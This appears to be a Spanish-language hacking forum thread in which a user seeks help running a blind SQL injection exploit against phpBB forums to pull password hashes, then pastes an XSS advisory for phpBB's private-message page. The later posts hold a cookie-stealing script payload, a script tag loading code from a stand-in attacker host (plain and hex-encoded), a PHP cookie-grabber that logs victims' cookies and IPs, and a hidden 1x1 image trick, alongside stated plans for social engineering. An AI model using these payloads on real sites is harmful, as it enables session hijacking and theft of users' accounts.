Mensajes

[prefijo_Aplicacion1]

pero, en la parte de "table_prefix" viendo que el "user_id" es solamente "el id"

este seria "phpbb_" o hay que buscarlo o hacerlo aparecer?

user_id es un campo de un registro

un registro puede tener de 1 a N campos, el registro se almacena en una tabla.

la tabla pertence a un BD

un BD puede tener muchasss Tablas.

En caso de que exitan 2 aplicaciones iguales usando la misma BD, estas deben de tener sus tablas con diferentes prefijos. Un ejemplo seria

Aplicacion1
prefijo_Aplicacion1_users.username
prefijo_Aplicacion1_users.user_id
prefijo_Aplicacion1_users.compleaños
prefijo_Aplicacion1_users.Campo_N

Aplicacion2
prefijo_Aplicacion2_users.username
prefijo_Aplicacion2_users.user_id
prefijo_Aplicacion2_users.compleaños
prefijo_Aplicacion2users.Campo_N

PrefijonombreBaseDeLaTabla.Nombre_del_Campo


Saludos

de todo e entendido viendo la fuente

<div class="forumbg forumbg-table">

<table class="table1" cellspacing="1" id="memberlist">

<tr class="bg2">
      <td><span class="rank-img"></span><a href="./memberlist.php?mode=viewprofile&amp;u=5">Usuario</a></td>

      <td class="posts"><a href="./search.php?author_id=5&amp;sr=posts" title="Buscar">x</a></td>
      <td class="info">&nbsp;</td>
      <td>Dom fecha hora pm</td>
      <td>Dom fecha hora pm&nbsp;</td>

viendo las ids, efectivamente va de 2 a n, en este caso
la id del usuario es 5

veo 2 partes q hacen referencia a la tabla y la mas similar es forumbg ya que habla 1 es la clase

Hola que tal.

user_id es un campo, por decir algo en este foro tienes un id fijate en tu perfil,

es diferente username a user_id, son campos distintos, pues puedes buscar en el codig fuente del php, generalmentre siembre viene un archivo .sql donde se crean todas las tablas, Tendrias que instalarlo y ver que pasa. (revisar la Base de datos)

es cierto, ahora me estaba fijando en la fuente y el id es el numero de usuario
apartir del primero hasta el ultimo que se registra

entonces "user_id" es solo el id...

pero, en la parte de "table_prefix" viendo que el "user_id" es solamente "el id"

este seria "phpbb_" o hay que buscarlo o hacerlo aparecer?

no recuerdo si lo guarda en un archivo de configuracion pero creo que si y este lo ocupara por que, como dice Anon, pone un prefijo a las tablas de la base de datos, generalmente la gente lo deja por default (phpbb_ ó smf_) si no es el caso, como tienes un bug de blind sql injection entonces podras sacar el nombre de las tablas pero tardaras mas

de hecho, investigando, por defecto la tabla de base de datos es phpbb_

e buscado en el codigo fuente y no e visto nada parecido

como encuentro o busco las tablas de un phpbb?
el blind sql que tengo saca directamente el hash pero tablas no.

como pregunta adicional, creo que el user_id es el nombre de usuario y el nombre que tiene como constante

digamos "pepe_13" es asi?

[investigue]

si ya entendi
que investigue y google...

Bueno, e estado investigando y gogleando por un gran cantidad de paginas

Busqueda

y en pocas (para no decir ninguna) dan una explicacion como aqui

lo mas que e visto es estos ejemplos

table_prefix."users"
table_prefix."users.username"

entonces seria:
table = users
prefix=username

e quedado mas confundido de la cuenta, si bien tu explicacion me fue muy util y las investigaciones no me salieron muy satisfactorias
me gustaria saber.. en un foro "phpbb" donde se puede encontrar el table_prefix

ya que el usage me pide: [host] [table_prefix] [user_id]

Hola, ya me e fijado bastante sobre este tema 

pero solo me queda una duda, en el usage del exploit me aparecio que tengo que ponerle el "table_prefix"



que quiere decir eso, que parte de la pagina es el table prefix?

[Mod Tag Board]

Hola tengo una duda, mas que todo de traduccion

en las indicaciones dice esto

(Mod Tag Board ) Remote Blind SQL Injection Exploit 


Works regardless PHP.ini settings

que quiere decir esto: Remote Blind SQL Injection Exploit  y Mod Tag Board

podes poner un <img> apuntando a tu php como si fuera un frame (el navegador va a hacer la peticion igual) y de 1x1

tenes toda la razon, es muy util saber esto
e aprendido una o 2 cosas despues de ver los manuales tambien

ahora una duda, e visto que en el asunto de las cookies se puede hacer que se active el php automaticamente.. pero al funcionar esto envia a otra pagina? o sigue en la misma pero ya capto la informacion en el ftp propio

otra aun mas importante

mi duda es, la pagina tiene que ser vulnerable (que ejecute xss) para que funcione el htaccess sumado con la aplicacion php?
o el hecho de que la imagen funcione como aplicacion hace que la aplicacion sirva de todas maneras, independientemente de si la pagina es o no vulnerable al xss

Saludos

lo recomendable es que vallas y busques informacion sobre XSS antes de volver a preguntar cualquier otra cosa

aqui en el foro hay muchos y muy bien explicados

es justamente lo que estoy haciendo aqui
vere lo que tienen sobre xss pero.. que posibilidades hay?
se pueden copiar las cookies sin una redireccion a una web?
lo puedo hacer como aplicacion pero.. lo de enviar de una web a otra pagina seria evidente

con un poquito de ingenieria social, no he visto bien el bug pero conozco de estos ataques Xss.   

en lo de ingenieria social no te preocupes, lo se hacer y de gran manera

lo que no entiendo es

Código [Seleccionar] Expandir

http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779

se supone que se le envia a la persona?

les e enviado un mensaje, si tengo que leerme un tutorial para poder enviar esto lo hago obviamente si es objetivo y me sirve

se puede activar un link que tome cookies sin crear una redireccion?
solo que se guarde y siga en la pagina actual

Saludos

Hola, e encontrado este xss

CODE
Use: http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779


Where [xss] need to be changed and replaced with several javascript and/or vBscript, etc (It's all up to your imaginations) - I'm not going to gave out any step-by-step tutorial for doing this, do your own experiment(s):

CODE
";!–"<script>alert(document.cookie);</script>=&{(alert(1))}


In order to do any redirection, you can go and use these script(s):

CODE
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e


And in order to put the cookies grabber, you can use this php script:

CODE
    $ip = $_SERVER['REMOTE_ADDR'];
    $referer = $_SERVER['HTTP_REFERER'];
    $agent = $_SERVER['HTTP_USER_AGENT'];

    $data = $_GET['warwolfz'];
    $time = date("Y-m-d G:i:s A");
    $text = "Time: ".$time."nIP:".$ip."nReferer:".$referer."nUser-Agent:".$agent."nCookie:".$data."nn";

    $file = fopen('cookies.html' , 'a');
    fwrite($file,$text);
    fclose($file);

    ?>

segun dicen, es en los mps pero no entiendo su funcionamiento

alguien me podria explicar de que trata?